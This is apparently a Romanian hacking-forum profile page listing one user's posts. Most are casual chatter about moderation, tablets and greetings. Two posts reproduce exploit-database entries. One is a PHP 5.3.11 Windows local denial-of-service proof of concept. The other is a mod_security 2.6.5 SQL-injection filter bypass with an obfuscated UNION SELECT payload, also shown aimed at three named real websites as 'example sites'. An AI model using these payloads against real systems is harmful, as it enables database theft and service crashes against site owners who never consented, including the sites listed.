- 
                
Posts
676 - 
                
Joined
 - 
                
Last visited
 - 
                
Days Won
7 
Everything posted by DarkyAngel
- 
	BZC a f?cut din nou, am dat report la mesaj, c? nu pot face screen. careva s? se ocupe de el, c? deja întrece limita.
 - 
	Mda, iar începe. Ban ! ar trebui cenzurat id-ul, ?i etc, p?r?i din mesajul lui
 - 
	înc? n-am primit, poate fac admini SE // cel cu bacala am primit, nu l-am bagat in seama, e cel mai bine .
 - 
	
	
				Ce credeti despre asta?Extraterestri WTF
DarkyAngel replied to CristianRoflmao's topic in Cosul de gunoi
"PRINTE" , "MONTRU" ? GTFO cu kanalele D ?i ?tirile voastre, dac? era pe Discovery mai ziceam.. - 
	nu d? prea bine.. încurajeaz? la spam.. cel mai bine cred c? ar fi dup? "vechime"
 - 
	v?d c? vrei s? te pi?i ?i pe regulament, având în vedere c? ai f?cut de vreo 3 ori 2x / 3x post..
 - 
	Vreau ?i eu ce-a fumat secure!
 - 
	Dup? cum zicea ?i sweby, tu ce ai f?cut pentru El ca s? te "ajute"?
 - 
	
	
				Ce parere aveti despre relativ noua platforma Onlive ?
DarkyAngel replied to Mandrake1942's topic in Off-topic
Eu încerc de vreo 2 zile s? fac onLive Desktop pe o tablet? de 8" ?i îmi zice c? func?ioneaz? doar pe cele cu ecran mai mare de 7" . - 
	Chuck Norris, save us ! @on, ?i eu sunt de partea PRO.
 - 
	1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm Angel Injection member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [+] PHP 5.3.11 (win) Local Denial Of Service [-] Found by Angel Injection [-] Link: www.php.net [-] Security -::RISK: High [-] http://1337day.com http://r00tw0rm.com http://i313.cc [-] Greetz to 1337day.com(r0073r) Team i313.cc(Hussain) Team r00tw0rm (CrosS) Team <?php $crash = substr_replace($strlen,$crash, (strlen($crash)-0xc3)*+23,(strlen($crash))); for($crash1=0;$crash1<0x7e33;$crash1++) $crash2=array(); array_push($crash2); $crash = new VARIANT(0x0dcd438); com_print_typeinfo($crash); ?> PHP 5.3.11 (win) Local Denial Of Service | Inj3ct0r - exploit database : vulnerability : 0day : shellcode
 - 
	Ca sugestie. încearc? s? schimbi linkul în fiecare zi, ?i metoda de criptare la fel s? se chinuie pu?in dac? vor . // + rep.
 - 
	Motorola flipout.. waiting to get my S III
 - 
	Gog nud ! ochim doi dintr-o lovitur? .
 - 
	FORM este un tag în html, ar fi bine s? ai minimul de cuno?tiin?e înainte s? încerci s? faci de-astea.
 - 
	Let me google that for you sau Let me google that for you
 - 
	La mul?i (b)ani !!! ?i mult? s?n?tate, c?-i mai bun? decât toate .
 - 
	----------------------------------------------------------------- # Exploit Title: mod_security 2.6.5 SQL injection bypass # Date: 21/04/2012 # Author: Phizo # Greetz: Inj3ct0r Exploit DataBase 1337day.com # Software Link: http://www.modsecurity.org/ # Version: 2.6.5 # Tested on: Windows 7 & Ubuntu 10.04 ---------------------------------------------------------------- /** Although I am using union-based injection the concept of the bypass is the same **/ [+] Bypass: +/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/# [+] PoC: http://victim/page.php?id=12+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/# [+] Example sites: -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- http://www.indiacctv.com/product.php?id=-18+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,0x5068697a6f,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/# http://www.outside-music.com/news.php?id=-1+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,4,0x5068697a6f,(/*!table_name*/),7,8,9,10,11,12,13+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/# http://www.atitelemetry.com/viewapp.php?id=7'+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,0x5068697a6f,/*!table_name*/,4,5,6,7+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/--+ -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- # 1337day.com [2012-04-22] mod_security 2.6.5 for Apache 2.2.x & 2.4.1 Released SQL injection bypass | Inj3ct0r - exploit database : vulnerability : 0day : shellcode
- 1 reply
 - 
	
- 1
 - 
					
						
					
							
					
						
					
				 
 
 - 
	Ce server, de ce joc, pe ce ruleaz? vps-ul , etc? d? ?i tu mai multe detalii
 - 
	E de ajuns ca s? n-o poat? decripta un sfert de forum .